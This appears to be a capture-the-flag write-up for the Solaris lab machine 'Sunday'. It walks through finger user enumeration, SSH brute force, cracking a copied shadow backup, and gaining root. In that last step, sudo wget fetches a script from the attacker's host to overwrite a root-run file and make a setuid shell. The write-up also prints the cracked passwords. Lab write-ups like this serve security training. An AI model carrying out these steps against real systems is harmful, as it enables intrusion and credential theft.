Summary

Sunday is an easy Linux box that can be exploited by brute-forcing the finger service and finding two users. One of which has default credentials that can be used to obtain a low privileged shell. By enumerating the system you will find a backup of the shadow file which can be bruteforced to obtain credentials of the second user. The final privilege escalation can be obtained by abusing both user’s sudo permissions. One user can execute wget with sudo and save it to a file that the other user can execute as sudo.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.1.190

PORT    STATE SERVICE VERSION
79/tcp  open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

However, the scanning time of Nmap is really long so also used masscan:

#masscan
open tcp 42273 10.129.88.74 1614514529
open tcp 22022 10.129.88.74 1614514552
open tcp 111 10.129.88.74 1614514604
open tcp 42302 10.129.88.74 1614514630
# end

It found some additional open ports that were investigated with nmap. Port 22022 was an SSH service:

PORT      STATE SERVICE VERSION
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)

Finger Enumeration

First, you will have to enumerate the finger service. You can issue this command to verify if a user exists:

finger root@sunday.htb
Login       Name               TTY         Idle    When    Where
root     Super-User            pts/3         sunday

Therefore, you can brute-force this service. In this case the perl script finger-user-enum.pl was used:

perl finger-user-enum.pl -U xato-net-10-million-usernames.txt -t 10.129.88.74

sammy@10.129.88.74: sammy                 console      10 18:25
sunny@10.129.88.74: sunny                 pts/3        24, 2018 

It found two users among other standard users. Let’s verify the results:

finger sammy@10.129.105.246
Login       Name               TTY         Idle    When    Where
sammy    sammy                 console      10 18:25

finger sunny@10.129.105.246
Login       Name               TTY         Idle    When    Where
sunny    sunny                 pts/2         13 Mon 12:30  10.10.14.147   

Brute-forcing Finger

After this, I used Hydra in an attempt to brute-force the service but that was very slow:

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.129.105.135 ssh -s 22022

After this, I used Medusa but this was also very slow. Then I used patator:

patator ssh_login host=10.129.105.246 port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0 -x ignore:mesg='Authentication failed.'

This was the only tool that worked. So, it shows that it’s worth trying several different tools that serve the same purpose if your usual tool doesn’t work. The result is:

sunny : sunday

Okay, so let’s authenticate with SSH:

ssh sunny@10.129.105.141 -p 22022 -oKexAlgorithms=+diffie-hellman-group1-sha1

Exploitation

This will provide you with a SSH shell as sunny. The home directory is quite odd:

sunny@sunday:~$ pwd
/export/home/sunny

When you check the permissions of user:

sunny@sunday:/home$ sudo -l
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

sunny@sunday:/home$ ls -la /root/troll
ls: cannot access /root/troll: Permission denied

Okay, so we can execute this file as root, let’s see what it does:

sunny@sunday:/home$ sudo /root/troll          testing                                          
uid=0(root) gid=0(root)

Okay, so it seems to echo something and also execute the id command. Let’s enumerate some more. In the / directory you will find a directory named backup which isn’t default and thus interesting. It contains a backup of shadow:

sunny@sunday:/backup$ ls
agent22.backup  shadow.backup

Let’s copy this over with scp:

scp -oKexAlgorithms=+diffie-hellman-group1-sha1 -P 22022 sunny@10.129.105.141:/backup/shadow.backup shadow.backup

Now you can crack it with a password crack tool, I used John:

john --wordlist=/usr/share/wordlists/rockyou.txt shadow.backup

This will find the password:

cooldude!        (sammy)

Lets switch user from ssh shell:

sunny@sunday:~$ su sammy
Password: 
sunny@sunday:~$ id
uid=101(sammy) gid=10(staff) groups=10(staff)

Now you will access to user.txt.


Privilege Escalation

Let’s check the permissions of Sammy:

sudo -l
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget

Nice, so you can run wget as sudo. Now it’s always important to go back to your enumeration and see if you can chain any vulnerabilities. This is possible since you can run wget as sudo and you can run the executable /root/troll. Therefore, the path to root is to overwrite the /root/troll. In this case I created the following file on my own machine:

cat getroot 
#!/bin/bash
cp /bin/bash /tmp/pwned; chmod +s /tmp/pwned

However, in hindsight, you could’ve also executed this:

#!/bin/bash

bash

This will provide you with a root shell.
First, you have to start two SSH shells. One with Sunny, the other with Sammy. This is very important since you need to do this quick as the /root/troll is refreshed every couple seconds. After doing so, you can run the following command from Sammy:

sudo wget -O /root/troll 10.10.14.147/getroot

Now, execute the following command as Sunny:

sudo /root/troll

This will create a file named pwned in /tmp that you can use to get a root shell:

sunny@sunday:~/Desktop$ ls -la /tmp
total 742
drwxrwxrwt  4 root sys     446 2021-03-01 12:52 .
drwxr-xr-x 26 root root     27 2020-09-30 13:20 ..
[...]
-r-sr-sr-x  1 root root 735368 2021-03-01 12:52 pwned

To obtain the root shell, execute:

sunny@sunday:~/Desktop$ /tmp/pwned -p
pwned-3.2# id
uid=101(sammy) gid=10(staff) euid=0(root) egid=0(root) groups=10(staff)
pwned-3.2# cat /root/root.txt
fb40fab61d99d37536daeec0d97af9b8

As a side note, you can also abuse wget’s functionality and cat the root flag directly with:

sudo wget -i /root/root.txt

Conclusion

This was an easy box but I found it to be pretty useful, I liked the privilege escalation due to having to combine several things to obtain the final root. What I disliked was that the box froze every couple seconds, not sure why but it made it take a lot longer. Hope you didn’t have this issue and enjoyed the writeup!